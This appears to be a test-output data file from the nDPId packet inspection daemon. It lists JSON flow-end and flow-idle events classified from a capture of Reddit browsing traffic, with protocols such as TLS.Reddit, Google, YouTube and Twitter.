-00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688843,"flow_last_seen":1605291689005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":3846,"flow_avg_l4_payload_len":202,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80c::2003","src_port":47304,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Web"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":278,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56562,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1442,"flow_first_seen":1605291686035,"flow_last_seen":1605291696381,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11528,"flow_tot_l4_payload_len":1922359,"flow_avg_l4_payload_len":1333,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56566,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686148,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56568,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00688{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686035,"flow_last_seen":1605291686149,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1605291686035,"flow_last_seen":1605291686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4181,"flow_avg_l4_payload_len":232,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56572,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56574,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56576,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":133,"flow_first_seen":1605291686060,"flow_last_seen":1605291697854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":10480,"flow_tot_l4_payload_len":99015,"flow_avg_l4_payload_len":744,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1605291686060,"flow_last_seen":1605291686196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4191,"flow_avg_l4_payload_len":246,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":5480,"flow_first_seen":1605291686064,"flow_last_seen":1605291695840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":9432,"flow_tot_l4_payload_len":5723539,"flow_avg_l4_payload_len":1044,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4547,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1605291686064,"flow_last_seen":1605291686203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4165,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291686084,"flow_last_seen":1605291686232,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":4573,"flow_avg_l4_payload_len":198,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56590,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1605291686084,"flow_last_seen":1605291686283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":9920,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690421,"flow_last_seen":1605291690571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8079,"flow_avg_l4_payload_len":230,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::2001","src_port":59624,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":112,"flow_first_seen":1605291686301,"flow_last_seen":1605291696305,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":40926,"flow_avg_l4_payload_len":365,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291689408,"flow_last_seen":1605291689979,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":8337,"flow_avg_l4_payload_len":185,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Reddit","breed":"Fun","category":"SocialNetwork"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291688344,"flow_last_seen":1605291688502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7212,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:9000:219c:ee00:6:44e3:f8c0:93a1","src_port":56186,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":118,"flow_first_seen":1605291686996,"flow_last_seen":1605291688354,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":94136,"flow_avg_l4_payload_len":797,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3b6","src_port":38320,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1605291687800,"flow_last_seen":1605291692129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":8436,"flow_avg_l4_payload_len":187,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1605291690405,"flow_last_seen":1605291690626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1360,"flow_tot_l4_payload_len":9313,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::345f:7ca5","src_port":46646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1605291688611,"flow_last_seen":1605291688858,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7595,"flow_avg_l4_payload_len":210,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2606:2800:134:1a0d:1429:742:782:b6","src_port":39736,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1605291687642,"flow_last_seen":1605291687853,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2416,"flow_tot_l4_payload_len":36007,"flow_avg_l4_payload_len":521,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":71,"flow_first_seen":1605291688830,"flow_last_seen":1605291698440,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":18805,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:805::2001","src_port":58122,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":146,"flow_first_seen":1605291687485,"flow_last_seen":1605291690985,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":5552,"flow_tot_l4_payload_len":121491,"flow_avg_l4_payload_len":832,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":42,"flow_first_seen":1605291688324,"flow_last_seen":1605291688572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":6036,"flow_avg_l4_payload_len":143,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1605291696948,"flow_last_seen":1605291697249,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7617,"flow_avg_l4_payload_len":331,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::34d3:acec","src_port":47006,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291688336,"flow_last_seen":1605291688453,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4038,"flow_avg_l4_payload_len":212,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::d83a:d1e6","src_port":51102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":174,"flow_first_seen":1605291688831,"flow_last_seen":1605291698470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3624,"flow_tot_l4_payload_len":123775,"flow_avg_l4_payload_len":711,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:815::2016","src_port":52296,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.YouTube","breed":"Fun","category":"Media"}}
-00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1605291684451,"flow_last_seen":1605291698602,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":8332,"flow_avg_l4_payload_len":157,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40028,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1605291684451,"flow_last_seen":1605291684592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":4078,"flow_avg_l4_payload_len":214,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40030,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1605291687761,"flow_last_seen":1605291687902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5000,"flow_avg_l4_payload_len":238,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":44,"flow_first_seen":1605291687933,"flow_last_seen":1605291688585,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":14745,"flow_avg_l4_payload_len":335,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:f916:5049:f87f:108e","src_port":48648,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
-00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1605291690926,"flow_last_seen":1605291691119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":6361,"flow_avg_l4_payload_len":181,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::200a","src_port":38166,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}}
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":73,"flow_first_seen":1605291686985,"flow_last_seen":1605291690314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2776,"flow_tot_l4_payload_len":41240,"flow_avg_l4_payload_len":564,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::df9:21c6","src_port":43492,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":11682,"source":"reddit.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605291688712,"flow_last_seen":1605291688927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":5005,"flow_avg_l4_payload_len":161,"midstream":0,"ts_msec":1605291698785,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::2006","src_port":54726,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}}
